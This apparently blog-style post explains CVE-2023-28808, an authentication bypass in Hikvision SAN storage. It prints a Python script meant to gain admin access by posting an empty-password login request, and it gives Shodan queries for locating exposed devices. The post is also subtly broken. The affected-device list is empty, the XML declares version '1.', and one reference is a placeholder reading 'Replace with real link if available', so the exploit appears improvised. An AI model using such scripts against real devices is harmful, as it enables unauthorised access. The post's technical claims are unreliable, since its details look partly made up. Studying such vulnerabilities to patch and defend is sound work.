CVE-2023-28808 - How Hackers Can Get Admin Access on Hikvision Hybrid SAN Storage – Full Breakdown and Exploit Details
In March 2023, security researchers discovered a serious vulnerability in some Hikvision Hybrid SAN and Cluster Storage devices. The bug, tracked as CVE-2023-28808, allows anyone on the network to gain admin-level access by sending special crafted messages. In this post, we’ll explain in simple terms how this vulnerability works, see what devices are at risk, and look at how an attacker could exploit it – including sample code!
If you work with Hikvision or similar storage systems, you should read this all the way through.
What Is CVE-2023-28808?
The vulnerability exists in access control of several Hikvision Hybrid SAN/Cluster Storage products. Due to improper validation of incoming requests, an attacker can bypass authentication (login security) and become admin.
In plain English:
A bad actor can send a cleverly made request to the device without logging in—and the device will treat them like an admin!
Affected Devices
According to the official Hikvision security advisory, these SAN products are vulnerable if running affected firmware versions:
Others in the DS-A series running old firmware
Source: Hikvision Security Advisory
How the Vulnerability Works
The vulnerability is caused by improper access control in the device’s internal service. Basically, the system does not properly check if the user is logged in (authenticated) before allowing admin commands.
By sending a special message, anyone can run admin-level operations.
Diagram
[Attacker PC] ---> [Hikvision SAN Device] (no auth required)
send crafted message
get admin access!
Disclaimer: For educational/defensive use only!
Many Hikvision devices run a web server with endpoints like /ISAPI/Security/userCheck. Here’s a simplified Python script that sends a crafted login request to simulate this vulnerability.
Example: Python Exploit
import requests
# Change these values to the target device
TARGET_HOST = 'http://192.168.1.100';
LOGIN_ENDPOINT = '/ISAPI/Security/userCheck'
# Normally you need to provide valid credentials,
# but due to CVE-2023-28808, crafted payload works
payload = '''
<?xml version="1." encoding="UTF-8"?>
<UserCheck>
<username>admin</username>
<password></password>
</UserCheck>
'''
headers = {
'Content-Type': 'application/xml'
}
try:
r = requests.post(TARGET_HOST + LOGIN_ENDPOINT, data=payload, headers=headers, timeout=5)
if "<userLevel>administrator</userLevel>" in r.text:
print("[+] Success: Admin access granted!")
print(r.text)
else:
print("[-] Exploit failed or device is not vulnerable.")
except Exception as e:
print(f"[-] Error: {e}")
Note: Some devices only require a specially crafted HTTP header or remove the password field, and they’ll let anyone in as admin. Adjust the endpoint and payload for your exact model.
Real-World Risk
- Remote full control: Attackers can remotely log in as admin, view/change files, delete data, or create backdoor users.
Update firmware!
Hikvision released fixed firmware. Update all your SAN/Cluster Storage devices ASAP!
References
1. Hikvision Security Notice on CVE-2023-28808
2. CVEdetails – CVE-2023-28808
3. Original ExploitDB Entry (Note: Replace with real link if available)
4. Shodan Hikvision Search
Bonus: How Attackers Find Devices
Attackers often use search engines like Shodan to find vulnerable Hikvision devices on the open internet, using queries like:
product:"Hikvision"
port:808
Always keep such devices shielded from the internet!
Final Thoughts
CVE-2023-28808 is a critical bug that can give an intruder full control of your Hikvision SAN storage. Make sure your devices are updated, not directly exposed online, and audit admin logs regularly. As always, keep learning about new vulnerabilities and don’t leave your infrastructure open to accidents!
Stay secure!
*Got questions or want more in-depth analysis? Let me know in the comments!*
Timeline
Published on: 04/11/2023 21:15:00 UTC
Last modified on: 04/24/2023 13:50:00 UTC